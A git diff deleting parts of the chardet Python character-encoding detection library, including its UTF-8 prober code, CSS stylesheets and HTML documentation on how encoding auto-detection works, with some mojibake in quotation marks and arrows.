Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -import constants, sys -from constants import eStart, eError, eItsMe -from charsetprober import CharSetProber -from codingstatemachine import CodingStateMachine -from mbcssm import UTF8SMModel - -ONE_CHAR_PROB = 0.5 - -class UTF8Prober(CharSetProber): - def __init__(self): - CharSetProber.__init__(self) - self._mCodingSM = CodingStateMachine(UTF8SMModel) - self.reset() - - def reset(self): - CharSetProber.reset(self) - self._mCodingSM.reset() - self._mNumOfMBChar = 0 - - def get_charset_name(self): - return "utf-8" - - def feed(self, aBuf): - for c in aBuf: - codingState = self._mCodingSM.next_state(c) - if codingState == eError: - self._mState = constants.eNotMe - break - elif codingState == eItsMe: - self._mState = constants.eFoundIt - break - elif codingState == eStart: - if self._mCodingSM.get_current_charlen() >= 2: - self._mNumOfMBChar += 1 - - if self.get_state() == constants.eDetecting: - if self.get_confidence() > constants.SHORTCUT_THRESHOLD: - self._mState = constants.eFoundIt - - return self.get_state() - - def get_confidence(self): - unlike = 0.99 - if self._mNumOfMBChar < 6: - for i in range(0, self._mNumOfMBChar): - unlike = unlike * ONE_CHAR_PROB - return 1.0 - unlike - else: - return unlike diff --git a/chardet/chardet/utf8prober.pyc b/chardet/chardet/utf8prober.pyc deleted file mode 100644 index 9303ce9..0000000 Binary files a/chardet/chardet/utf8prober.pyc and /dev/null differ diff --git a/chardet/css/chardet.css b/chardet/css/chardet.css deleted file mode 100644 index 91baaf3..0000000 --- a/chardet/css/chardet.css +++ /dev/null @@ -1,299 +0,0 @@ -html { - margin: 0; - padding: 0; -} - -body { - background-color: #fff; - color: #333; - font-family: 'Lucida Grande', Verdana, Geneva, Lucida, Helvetica, sans-serif; - font-size: 100%; - margin: 10px; - padding: 0; -} - -a:link, a:visited { - background-color: transparent; - color: #333; - text-decoration: none !important; - border-bottom: 1px dotted #333 !important; - text-decoration: underline; - border-bottom: 0; -} - -a:hover { - background-color: transparent; - color: #993344; - text-decoration: none !important; - text-decoration: underline; - border-bottom: 1px dotted #993344 !important; - border-bottom: 0; -} - -h1 { - margin: 8px 0 0 0; - padding: 0; - font-variant: small-caps; - letter-spacing: 0.1em; - font-family: "Book Antiqua", Georgia, Palatino, Times, "Times New Roman", serif; -} - -h1 a:link, h1 a:visited, h1 a:hover { - background-color: transparent ! important; - color: #333 ! important; - text-decoration: none ! important; - border-bottom: 0px ! important; -} - -#intro { - width: 730px; - } - -#intro ul { - margin-left: 0; - padding-left: 0; - display: inline; -} - -#intro ul li { - display: inline; - font-size: small; -} - -#intro ul li.li1 { -} - -#intro p { - font-size: small; - font-weight: normal; - margin: 1.2em 0 0 0; - padding: 0; -} - -.z { - float:left; - background: url(/img/shadowAlpha.png) no-repeat bottom right !important; - background: url(/img/shadow.gif) no-repeat bottom right; - margin: 15px 0 0 10px !important; - margin: 15px 0 0 5px; -} - -.z .sectionInner { - background: none !important; - background: url(/img/shadow2.gif) no-repeat left top; - padding: 0 !important; - padding: 0 6px 6px 0; - } - -.z .sectionInner .sectionInner2 { - background-color: #fff; - border: 1px solid #a9a9a9; - padding: 4px; - margin: -6px 6px 6px -6px !important; - margin: 0; -} - -.s { - margin-left: 1em; - margin-right: 1em; - margin-bottom: 1em; -} - -#main { - clear: left; - margin-left: 11px; - margin-bottom: 2em; - font-size: small; -} - -#mainInner { - margin-left: 1em; - margin-bottom: 2em; - padding-top: 1em; -} - -.footernavigation { - clear: both; - font-size: small; - padding-bottom: 1em; - margin-bottom: 0; -} - -.example, .section, .appendix { - line-height: 150%; -} - -#breadcrumb { - width: 100%; - margin: 0 0 1em 0; - padding: 0; - line-height: 140%; - font-size: small; -} - -#breadcrumb #thispage { - font-weight: bold; -} - -/* ----- Python code syntax coloring ----- */ -.computeroutput, .traceback, .pykeyword, .pystring, .pycomment, .pyfunction, .pyclass { - background-color: white; -} - -.pykeyword, .pyfunction, .pyclass { - font-weight: bold; -} - -.computeroutput { - color: teal; -} - -.traceback { - color: red; -} - -.pykeyword { - color: navy; -} - -.pystring { - color: olive; -} - -.pycomment { - color: green; - font-style: italic; -} - -.pyfunction { - color: teal; -} - -.pyclass { - color: blue; -} - -/* ----- standard stuff ----- */ -.skip { - display: none; -} - -samp, code, tt, pre { - font-weight: normal; - font-family: monospace; - font-size: small; -} - -img { - border: 0; -} - -acronym, abbr { -/* border-bottom: 1px dotted #333;*/ - border-bottom: 0; - font-style: normal; - cursor: help; -} - -hr { - clear: both; - margin-top: 2em !important; - margin-top: 1em; - height: 1px; - background-color: #cecbc6; - color: #cecbc6; -} - -#footer { - text-align: center; - font-size: x-small; -} - -body.docs .example { - border-left: 4px double #ddd !important; - border-left: 1px solid #ccc; - margin-left: 2em; - padding-left: 2em; -} - -body.docs .example h3 { - font-size: 100%; -} - -body.docs .example a.skip:link, -body.docs .example a.skip:visited, -body.docs .example a.skip:hover, -body.docs .section h3.title a.skip:link, -body.docs .section h3.title a.skip:visited, -body.docs .section h3.title a.skip:hover, -body.docs .appendix h3.title a.skip:link, -body.docs .appendix h3.title a.skip:visited, -body.docs .appendix h3.title a.skip:hover { - display: block; - float: left; - vertical-align: bottom; - text-decoration: none; - border-bottom: 0 ! important; - margin-right: 6px; -} - -.reference-from h3, -.seealso h3, -.furtherreading h3 { - margin-top: -1.2em; - margin-left: -15px; - font-size: small; - width: 8em; - border: 1px solid #a9a9a9; - padding: 3px 3px 3px 13px; - background: white; - position: relative; -} - -.reference-from, .seealso, .furtherreading { - width: 680px; - margin-top: 3em; - margin-bottom: 3em; - border: 1px solid #a9a9a9; -} - -table.tip, table.note, table.warning, table.caution, table.important { - margin-bottom: 1em; -} - -.table h3 { - display: none; -} - -.table table td { - padding: 5px 1em 5px 1em; -} - -div.download { - width: 708px; - margin-top: 3em; - margin-bottom: 3em; - border: 1px solid #a9a9a9; -} - -div.download h3 { - margin-top: -1.2em; - margin-left: -15px; - font-size: small; - width: 10em; - border: 1px solid #a9a9a9; - padding: 3px 3px 3px 13px; - background-color: #fff; - color: #222; - position: relative; -} - -div.download p { - margin-left: 1em; -} - -div.download ul { - list-style: none; - padding-left: 1em; - margin-left: 0; -} diff --git a/chardet/docs/dist/docs/css/chardet.css b/chardet/docs/dist/docs/css/chardet.css deleted file mode 100644 index 91baaf3..0000000 --- a/chardet/docs/dist/docs/css/chardet.css +++ /dev/null @@ -1,299 +0,0 @@ -html { - margin: 0; - padding: 0; -} - -body { - background-color: #fff; - color: #333; - font-family: 'Lucida Grande', Verdana, Geneva, Lucida, Helvetica, sans-serif; - font-size: 100%; - margin: 10px; - padding: 0; -} - -a:link, a:visited { - background-color: transparent; - color: #333; - text-decoration: none !important; - border-bottom: 1px dotted #333 !important; - text-decoration: underline; - border-bottom: 0; -} - -a:hover { - background-color: transparent; - color: #993344; - text-decoration: none !important; - text-decoration: underline; - border-bottom: 1px dotted #993344 !important; - border-bottom: 0; -} - -h1 { - margin: 8px 0 0 0; - padding: 0; - font-variant: small-caps; - letter-spacing: 0.1em; - font-family: "Book Antiqua", Georgia, Palatino, Times, "Times New Roman", serif; -} - -h1 a:link, h1 a:visited, h1 a:hover { - background-color: transparent ! important; - color: #333 ! important; - text-decoration: none ! important; - border-bottom: 0px ! important; -} - -#intro { - width: 730px; - } - -#intro ul { - margin-left: 0; - padding-left: 0; - display: inline; -} - -#intro ul li { - display: inline; - font-size: small; -} - -#intro ul li.li1 { -} - -#intro p { - font-size: small; - font-weight: normal; - margin: 1.2em 0 0 0; - padding: 0; -} - -.z { - float:left; - background: url(/img/shadowAlpha.png) no-repeat bottom right !important; - background: url(/img/shadow.gif) no-repeat bottom right; - margin: 15px 0 0 10px !important; - margin: 15px 0 0 5px; -} - -.z .sectionInner { - background: none !important; - background: url(/img/shadow2.gif) no-repeat left top; - padding: 0 !important; - padding: 0 6px 6px 0; - } - -.z .sectionInner .sectionInner2 { - background-color: #fff; - border: 1px solid #a9a9a9; - padding: 4px; - margin: -6px 6px 6px -6px !important; - margin: 0; -} - -.s { - margin-left: 1em; - margin-right: 1em; - margin-bottom: 1em; -} - -#main { - clear: left; - margin-left: 11px; - margin-bottom: 2em; - font-size: small; -} - -#mainInner { - margin-left: 1em; - margin-bottom: 2em; - padding-top: 1em; -} - -.footernavigation { - clear: both; - font-size: small; - padding-bottom: 1em; - margin-bottom: 0; -} - -.example, .section, .appendix { - line-height: 150%; -} - -#breadcrumb { - width: 100%; - margin: 0 0 1em 0; - padding: 0; - line-height: 140%; - font-size: small; -} - -#breadcrumb #thispage { - font-weight: bold; -} - -/* ----- Python code syntax coloring ----- */ -.computeroutput, .traceback, .pykeyword, .pystring, .pycomment, .pyfunction, .pyclass { - background-color: white; -} - -.pykeyword, .pyfunction, .pyclass { - font-weight: bold; -} - -.computeroutput { - color: teal; -} - -.traceback { - color: red; -} - -.pykeyword { - color: navy; -} - -.pystring { - color: olive; -} - -.pycomment { - color: green; - font-style: italic; -} - -.pyfunction { - color: teal; -} - -.pyclass { - color: blue; -} - -/* ----- standard stuff ----- */ -.skip { - display: none; -} - -samp, code, tt, pre { - font-weight: normal; - font-family: monospace; - font-size: small; -} - -img { - border: 0; -} - -acronym, abbr { -/* border-bottom: 1px dotted #333;*/ - border-bottom: 0; - font-style: normal; - cursor: help; -} - -hr { - clear: both; - margin-top: 2em !important; - margin-top: 1em; - height: 1px; - background-color: #cecbc6; - color: #cecbc6; -} - -#footer { - text-align: center; - font-size: x-small; -} - -body.docs .example { - border-left: 4px double #ddd !important; - border-left: 1px solid #ccc; - margin-left: 2em; - padding-left: 2em; -} - -body.docs .example h3 { - font-size: 100%; -} - -body.docs .example a.skip:link, -body.docs .example a.skip:visited, -body.docs .example a.skip:hover, -body.docs .section h3.title a.skip:link, -body.docs .section h3.title a.skip:visited, -body.docs .section h3.title a.skip:hover, -body.docs .appendix h3.title a.skip:link, -body.docs .appendix h3.title a.skip:visited, -body.docs .appendix h3.title a.skip:hover { - display: block; - float: left; - vertical-align: bottom; - text-decoration: none; - border-bottom: 0 ! important; - margin-right: 6px; -} - -.reference-from h3, -.seealso h3, -.furtherreading h3 { - margin-top: -1.2em; - margin-left: -15px; - font-size: small; - width: 8em; - border: 1px solid #a9a9a9; - padding: 3px 3px 3px 13px; - background: white; - position: relative; -} - -.reference-from, .seealso, .furtherreading { - width: 680px; - margin-top: 3em; - margin-bottom: 3em; - border: 1px solid #a9a9a9; -} - -table.tip, table.note, table.warning, table.caution, table.important { - margin-bottom: 1em; -} - -.table h3 { - display: none; -} - -.table table td { - padding: 5px 1em 5px 1em; -} - -div.download { - width: 708px; - margin-top: 3em; - margin-bottom: 3em; - border: 1px solid #a9a9a9; -} - -div.download h3 { - margin-top: -1.2em; - margin-left: -15px; - font-size: small; - width: 10em; - border: 1px solid #a9a9a9; - padding: 3px 3px 3px 13px; - background-color: #fff; - color: #222; - position: relative; -} - -div.download p { - margin-left: 1em; -} - -div.download ul { - list-style: none; - padding-left: 1em; - margin-left: 0; -} diff --git a/chardet/docs/dist/docs/faq.html b/chardet/docs/dist/docs/faq.html deleted file mode 100644 index 35ebc9d..0000000 --- a/chardet/docs/dist/docs/faq.html +++ /dev/null @@ -1,107 +0,0 @@ - - - - -Frequently asked questions [Universal Encoding Detector] - - - - - - - - - - -

- -
-
-
- -
-
-

- Frequently asked questions

-
-
-
-
-

- What is character encoding?

-
-
-

When you think of ג€textג€, you probably think of ג€characters and symbols I see on my computer screenג€. But computers don't deal in characters and symbols; they deal in bits and bytes. Every piece of text you've ever seen on a computer screen is actually stored in a particular character encoding. There are many different character encodings, some optimized for particular languages like Russian or Chinese or English, and others that can be used for multiple languages. Very roughly speaking, the character encoding provides a mapping between the stuff you see on your screen and the stuff your computer actually stores in memory and on disk.

-

In reality, it's more complicated than that. Many characters are common to multiple encodings, but each encoding may use a different sequence of bytes to actually store those characters in memory or on disk. So you can think of the character encoding as a kind of decryption key for the text. Whenever someone gives you a sequence of bytes and claims it's ג€textג€, you need to know what character encoding they used so you can decode the bytes into characters and display them (or process them, or whatever).

-
-
-
-

- What is character encoding auto-detection?

-
-
-

It means taking a sequence of bytes in an unknown character encoding, and attempting to determine the encoding so you can read the text. It's like cracking a code when you don't have the decryption key.

-
-
-
-

- Isn't that impossible?

-
-
-

In general, yes. However, some encodings are optimized for specific languages, and languages are not random. Some character sequences pop up all the time, while other sequences make no sense. A person fluent in English who opens a newspaper and finds ג€txzqJv 2!dasd0a QqdKjvzג€ will instantly recognize that that isn't English (even though it is composed entirely of English letters). By studying lots of ג€typicalג€ text, a computer algorithm can simulate this kind of fluency and make an educated guess about a text's language.

-

In other words, encoding detection is really language detection, combined with knowledge of which languages tend to use which character encodings.

-
-
-
-

- Who wrote this detection algorithm?

-
-
-

This library is a port of the auto-detection code in Mozilla. I have attempted to maintain as much of the original structure as possible (mostly for selfish reasons, to make it easier to maintain the port as the original code evolves). I have also retained the original authors' comments, which are quite extensive and informative.

-

You may also be interested in the research paper which led to the Mozilla implementation, A composite approach to language/encoding detection.

-
-
-
-

- Yippie! Screw the standards, I'll just auto-detect everything!

-
-
-

Don't do that. Virtually every format and protocol contains a method for specifying character encoding.

-
    -
  • HTTP can define a charset parameter in the Content-type header.
  • -
  • HTML documents can define a <meta http-equiv="content-type"> element in the <head> of a web page.
  • -
  • XML documents can define an encoding attribute in the XML prolog.
  • -
-

If text comes with explicit character encoding information, you should use it. If the text has no explicit information, but the relevant standard defines a default encoding, you should use that. (This is harder than it sounds, because standards can overlap. If you fetch an XML document over HTTP, you need to support both standards and figure out which one wins if they give you conflicting information.)

-

Despite the complexity, it's worthwhile to follow standards and respect explicit character encoding information. It will almost certainly be faster and more accurate than trying to auto-detect the encoding. It will also make the world a better place, since your program will interoperate with other programs that follow the same standards.

-
-
-
-

- Why bother with auto-detection if it's slow, inaccurate, and non-standard?

-
-
-

Sometimes you receive text with verifiably inaccurate encoding information. Or text without any encoding information, and the specified default encoding doesn't work. There are also some poorly designed standards that have no way to specify encoding at all.

-

If following the relevant standards gets you nowhere, and you decide that processing the text is more important than maintaining interoperability, then you can try to auto-detect the character encoding as a last resort. An example is my Universal Feed Parser, which calls this auto-detection library only after exhausting all other options.

-
-
-
-
ג†ֲ Documentation -
-
-Supported encodingsֲ ג†’
-
-
- -
- - diff --git a/chardet/docs/dist/docs/history.html b/chardet/docs/dist/docs/history.html deleted file mode 100644 index 2f846e3..0000000 --- a/chardet/docs/dist/docs/history.html +++ /dev/null @@ -1,65 +0,0 @@ - - - - -Revision history [Universal Encoding Detector] - - - - - - - - - - -
- -
-
-
- -
-
-
-

- Revision history

-
-

-

Universal Encoding Detector is currently at version 1.0.1.

-
-
-
-
-
-
1.0.1 (2008-03-05)
-
    -
  • fixed typo in detecting little endian UTF-16; closes issue 81 -
  • -
  • fixed length of ISO2022JPCharLenTable; closes issue 98 -
  • -
-
1.0 (2006-01-10)
-
  • Initial release
-
-
-
-
ג†ֲ How it works -
-
-Terms of useֲ ג†’
-
-
- -
- - diff --git a/chardet/docs/dist/docs/how-it-works.html b/chardet/docs/dist/docs/how-it-works.html deleted file mode 100644 index 6a1fb2d..0000000 --- a/chardet/docs/dist/docs/how-it-works.html +++ /dev/null @@ -1,114 +0,0 @@ - - - - -How it works [Universal Encoding Detector] - - - - - - - - - - -
- -
-
-
- -
-
-
-

- How it works

-
-

-

This is a brief guide to navigating the code itself.

-
-
-
-
-

First, you should read A composite approach to language/encoding detection, which explains the detection algorithm and how it was derived. This will help you later when you stumble across the huge character frequency distribution tables like big5freq.py and language models like langcyrillicmodel.py.

-

The main entry point for the detection algorithm is universaldetector.py, which has one class, UniversalDetector. (You might think the main entry point is the detect function in chardet/__init__.py, but that's really just a convenience function that creates a UniversalDetector object, calls it, and returns its result.)

-

There are 5 categories of encodings that UniversalDetector handles:

-
    -
  1. -UTF-n with a BOM. This includes UTF-8, both BE and LE variants of UTF-16, and all 4 byte-order variants of UTF-32.
  2. -
  3. Escaped encodings, which are entirely 7-bit ASCII compatible, where non-ASCII characters start with an escape sequence. Examples: ISO-2022-JP (Japanese) and HZ-GB-2312 (Chinese).
  4. -
  5. Multi-byte encodings, where each character is represented by a variable number of bytes. Examples: Big5 (Chinese), SHIFT_JIS (Japanese), EUC-KR (Korean), and UTF-8 without a BOM.
  6. -
  7. Single-byte encodings, where each character is represented by one byte. Examples: KOI8-R (Russian), windows-1255 (Hebrew), and TIS-620 (Thai).
  8. -
  9. -windows-1252, which is used primarily on Microsoft Windows by middle managers who don't know a character encoding from a hole in the ground.
  10. -
-
-
-

- UTF-n with a BOM -

-
-
-

If the text starts with a BOM, we can reasonably assume that the text is encoded in UTF-8, UTF-16, or UTF-32. (The BOM will tell us exactly which one; that's what it's for.) This is handled inline in UniversalDetector, which returns the result immediately without any further processing.

-
-
-
-

- Escaped encodings

-
-
-

If the text contains a recognizable escape sequence that might indicate an escaped encoding, UniversalDetector creates an EscCharSetProber (defined in escprober.py) and feeds it the text.

-

EscCharSetProber creates a series of state machines, based on models of HZ-GB-2312, ISO-2022-CN, ISO-2022-JP, and ISO-2022-KR (defined in escsm.py). EscCharSetProber feeds the text to each of these state machines, one byte at a time. If any state machine ends up uniquely identifying the encoding, EscCharSetProber immediately returns the positive result to UniversalDetector, which returns it to the caller. If any state machine hits an illegal sequence, it is dropped and processing continues with the other state machines.

-
-
-
-

- Multi-byte encodings

-
-
-

Assuming no BOM, UniversalDetector checks whether the text contains any high-bit characters. If so, it creates a series of ג€probersג€ for detecting multi-byte encodings, single-byte encodings, and as a last resort, windows-1252.

-

The multi-byte encoding prober, MBCSGroupProber (defined in mbcsgroupprober.py), is really just a shell that manages a group of other probers, one for each multi-byte encoding: Big5, GB2312, EUC-TW, EUC-KR, EUC-JP, SHIFT_JIS, and UTF-8. MBCSGroupProber feeds the text to each of these encoding-specific probers and checks the results. If a prober reports that it has found an illegal byte sequence, it is dropped from further processing (so that, for instance, any subsequent calls to UniversalDetector.feed will skip that prober). If a prober reports that it is reasonably confident that it has detected the encoding, MBCSGroupProber reports this positive result to UniversalDetector, which reports the result to the caller.

-

Most of the multi-byte encoding probers are inherited from MultiByteCharSetProber (defined in mbcharsetprober.py), and simply hook up the appropriate state machine and distribution analyzer and let MultiByteCharSetProber do the rest of the work. MultiByteCharSetProber runs the text through the encoding-specific state machine, one byte at a time, to look for byte sequences that would indicate a conclusive positive or negative result. At the same time, MultiByteCharSetProber feeds the text to an encoding-specific distribution analyzer.

-

The distribution analyzers (each defined in chardistribution.py) use language-specific models of which characters are used most frequently. Once MultiByteCharSetProber has fed enough text to the distribution analyzer, it calculates a confidence rating based on the number of frequently-used characters, the total number of characters, and a language-specific distribution ratio. If the confidence is high enough, MultiByteCharSetProber returns the result to MBCSGroupProber, which returns it to UniversalDetector, which returns it to the caller.

-

The case of Japanese is more difficult. Single-character distribution analysis is not always sufficient to distinguish between EUC-JP and SHIFT_JIS, so the SJISProber (defined in sjisprober.py) also uses 2-character distribution analysis. SJISContextAnalysis and EUCJPContextAnalysis (both defined in jpcntx.py and both inheriting from a common JapaneseContextAnalysis class) check the frequency of Hiragana syllabary characters within the text. Once enough text has been processed, they return a confidence level to SJISProber, which checks both analyzers and returns the higher confidence level to MBCSGroupProber.

-
-
-
-

- Single-byte encodings

-
-
-

The single-byte encoding prober, SBCSGroupProber (defined in sbcsgroupprober.py), is also just a shell that manages a group of other probers, one for each combination of single-byte encoding and language: windows-1251, KOI8-R, ISO-8859-5, MacCyrillic, IBM855, and IBM866 (Russian); ISO-8859-7 and windows-1253 (Greek); ISO-8859-5 and windows-1251 (Bulgarian); ISO-8859-2 and windows-1250 (Hungarian); TIS-620 (Thai); windows-1255 and ISO-8859-8 (Hebrew).

-

SBCSGroupProber feeds the text to each of these encoding+language-specific probers and checks the results. These probers are all implemented as a single class, SingleByteCharSetProber (defined in sbcharsetprober.py), which takes a language model as an argument. The language model defines how frequently different 2-character sequences appear in typical text. SingleByteCharSetProber processes the text and tallies the most frequently used 2-character sequences. Once enough text has been processed, it calculates a confidence level based on the number of frequently-used sequences, the total number of characters, and a language-specific distribution ratio.

-

Hebrew is handled as a special case. If the text appears to be Hebrew based on 2-character distribution analysis, HebrewProber (defined in hebrewprober.py) tries to distinguish between Visual Hebrew (where the source text actually stored ג€backwardsג€ line-by-line, and then displayed verbatim so it can be read from right to left) and Logical Hebrew (where the source text is stored in reading order and then rendered right-to-left by the client). Because certain characters are encoded differently based on whether they appear in the middle of or at the end of a word, we can make a reasonable guess about direction of the source text, and return the appropriate encoding (windows-1255 for Logical Hebrew, or ISO-8859-8 for Visual Hebrew).

-
-
-
-

- windows-1252

-
-
-

If UniversalDetector detects a high-bit character in the text, but none of the other multi-byte or single-byte encoding probers return a confident result, it creates a Latin1Prober (defined in latin1prober.py) to try to detect English text in a windows-1252 encoding. This detection is inherently unreliable, because English letters are encoded in the same way in many different encodings. The only way to distinguish windows-1252 is through commonly used symbols like smart quotes, curly apostrophes, copyright symbols, and the like. Latin1Prober automatically reduces its confidence rating to allow more accurate probers to win if at all possible.

-
-
-
-
ג†ֲ Usage -
-
-Revision historyֲ ג†’
-
-
- -
- - diff --git a/chardet/docs/dist/docs/images/caution.png b/chardet/docs/dist/docs/images/caution.png deleted file mode 100644 index 5b7809c..0000000 Binary files a/chardet/docs/dist/docs/images/caution.png and /dev/null differ diff --git a/chardet/docs/dist/docs/images/important.png b/chardet/docs/dist/docs/images/important.png deleted file mode 100644 index fc1db35..0000000 Binary files a/chardet/docs/dist/docs/images/important.png and /dev/null differ diff --git a/chardet/docs/dist/docs/images/note.png b/chardet/docs/dist/docs/images/note.png deleted file mode 100644 index d0c3c64..0000000 Binary files a/chardet/docs/dist/docs/images/note.png and /dev/null differ diff --git a/chardet/docs/dist/docs/images/permalink.gif b/chardet/docs/dist/docs/images/permalink.gif deleted file mode 100644 index b843ea8..0000000 Binary files a/chardet/docs/dist/docs/images/permalink.gif and /dev/null differ diff --git a/chardet/docs/dist/docs/images/tip.png b/chardet/docs/dist/docs/images/tip.png deleted file mode 100644 index 5c4aab3..0000000 Binary files a/chardet/docs/dist/docs/images/tip.png and /dev/null differ diff --git a/chardet/docs/dist/docs/images/warning.png b/chardet/docs/dist/docs/images/warning.png deleted file mode 100644 index 1c33db8..0000000 Binary files a/chardet/docs/dist/docs/images/warning.png and /dev/null differ diff --git a/chardet/docs/dist/docs/index.html b/chardet/docs/dist/docs/index.html deleted file mode 100644 index c2a58ee..0000000 --- a/chardet/docs/dist/docs/index.html +++ /dev/null @@ -1,74 +0,0 @@ - - - - -Documentation [Universal Encoding Detector] - - - - - - - - -
- -
-
-
- -
-
-
-
-
- -
-
-
-
-Frequently asked questionsֲ ג†’
-
-
- -
- - diff --git a/chardet/docs/dist/docs/license.html b/chardet/docs/dist/docs/license.html deleted file mode 100644 index 3420feb..0000000 --- a/chardet/docs/dist/docs/license.html +++ /dev/null @@ -1,62 +0,0 @@ - - - - -Terms of use [Universal Encoding Detector] - - - - - - - - - -
- -
-
-
- -
-
-

- Terms of use

-
-
-

- Software

-

The Universal Encoding Detector library is copyright ֲ© 2006-2008 Mark Pilgrim. All rights reserved.

-

Portions copyright ֲ© 1998-2001 Netscape Communications Corporation. All rights reserved.

-

The Universal Encoding Detector library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version.

-

This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details.

-

You should have received a copy of the GNU Lesser General Public License along with this library (in a file named COPYING); if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA

-

- Documentation

-

The Universal Encoding Detector documentation is copyright ֲ© 2006-2008 Mark Pilgrim. All rights reserved.

-

Redistribution and use in source (XML DocBook) and ג€compiledג€ forms (SGML, HTML, PDF, PostScript, RTF and so forth) with or without modification, are permitted provided that the following conditions are met:

-
    -
  1. Redistributions of source code (XML DocBook) must retain the above copyright notice, this list of conditions and the following disclaimer unmodified.
  2. -
  3. Redistributions in compiled form (transformed to other DTDs, converted to PDF, PostScript, RTF and other formats) must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
  4. -
-

THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR ג€AS ISג€ AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

-
-
-
ג†ֲ Revision history -
-
-
-
- -
- - diff --git a/chardet/docs/dist/docs/supported-encodings.html b/chardet/docs/dist/docs/supported-encodings.html deleted file mode 100644 index 9e5a7d6..0000000 --- a/chardet/docs/dist/docs/supported-encodings.html +++ /dev/null @@ -1,86 +0,0 @@ - - - - -Supported encodings [Universal Encoding Detector] - - - - - - - - - - -
- -
-
-
- -
-
-
-

- Supported encodings

-
-

-

Universal Encoding Detector currently supports over two dozen character encodings.

-
-
-
-
-
    -
  • -Big5, GB2312/GB18030, EUC-TW, HZ-GB-2312, and ISO-2022-CN (Traditional and Simplified Chinese)
  • -
  • -EUC-JP, SHIFT_JIS, and ISO-2022-JP (Japanese)
  • -
  • -EUC-KR and ISO-2022-KR (Korean)
  • -
  • -KOI8-R, MacCyrillic, IBM855, IBM866, ISO-8859-5, and windows-1251 (Russian)
  • -
  • -ISO-8859-2 and windows-1250 (Hungarian)
  • -
  • -ISO-8859-5 and windows-1251 (Bulgarian)
  • -
  • windows-1252
  • -
  • -ISO-8859-7 and windows-1253 (Greek)
  • -
  • -ISO-8859-8 and windows-1255 (Visual and Logical Hebrew)
  • -
  • -TIS-620 (Thai)
  • -
  • -UTF-32 BE, LE, 3412-ordered, or 2143-ordered (with a BOM)
  • -
  • -UTF-16 BE or LE (with a BOM)
  • -
  • -UTF-8 (with or without a BOM)
  • -
  • ASCII
  • -
- - - -
Caution
Due to inherent similarities between certain encodings, some encodings may be detected incorrectly. In my tests, the most problematic case was Hungarian text encoded as ISO-8859-2 or windows-1250 (encoded as one but reported as the other). Also, Greek text encoded as ISO-8859-7 was often mis-reported as ISO-8859-2. Your mileage may vary.
-
-
-
ג†ֲ Frequently asked questions -
-
-Usageֲ ג†’
-
-
- -
- - diff --git a/chardet/docs/dist/docs/usage.html b/chardet/docs/dist/docs/usage.html deleted file mode 100644 index d3cf72e..0000000 --- a/chardet/docs/dist/docs/usage.html +++ /dev/null @@ -1,107 +0,0 @@ - - - - -Usage [Universal Encoding Detector] - - - - - - - - - - -
- -
-
-
- -
-
-

- Usage

-
-
-
-
-

- Basic usage

-
-
-

The easiest way to use the Universal Encoding Detector library is with the detect function.

-
-

Example:ֲ Using the detect function

-

The detect function takes one argument, a non-Unicode string. It returns a dictionary containing the auto-detected character encoding and a confidence level from 0 to 1.

-
>>> import urllib
->>> rawdata = urllib.urlopen('http://yahoo.co.jp/').read()
->>> import chardet
->>> chardet.detect(rawdata)
-{'encoding': 'EUC-JP', 'confidence': 0.99}
-
-
-
-
-

- Advanced usage

-
-
-

If you're dealing with a large amount of text, you can call the Universal Encoding Detector library incrementally, and it will stop as soon as it is confident enough to report its results.

-

Create a UniversalDetector object, then call its feed method repeatedly with each block of text. If the detector reaches a minimum threshold of confidence, it will set detector.done to True.

-

Once you've exhausted the source text, call detector.close(), which will do some final calculations in case the detector didn't hit its minimum confidence threshold earlier. Then detector.result will be a dictionary containing the auto-detected character encoding and confidence level (the same as the chardet.detect function returns).

-
-

Example:ֲ Detecting encoding incrementally

-
import urllib
-from chardet.universaldetector import UniversalDetector
-
-usock = urllib.urlopen('http://yahoo.co.jp/')
-detector = UniversalDetector()
-for line in usock.readlines():
-    detector.feed(line)
-    if detector.done: break
-detector.close()
-usock.close()
-print detector.result
-
{'encoding': 'EUC-JP', 'confidence': 0.99}
-
-

If you want to detect the encoding of multiple texts (such as separate files), you can re-use a single UniversalDetector object. Just call detector.reset() at the start of each file, call detector.feed as many times as you like, and then call detector.close() and check the detector.result dictionary for the file's results.

-
-

Example:ֲ Detecting encodings of multiple files

-
import glob
-from charset.universaldetector import UniversalDetector
-
-detector = UniversalDetector()
-for filename in glob.glob('*.xml'):
-    print filename.ljust(60),
-    detector.reset()
-    for line in file(filename, 'rb'):
-        detector.feed(line)
-        if detector.done: break
-    detector.close()
-    print detector.result
-
-
-
-
-
-
ג†ֲ Supported encodings -
-
-How it worksֲ ג†’
-
-
- -
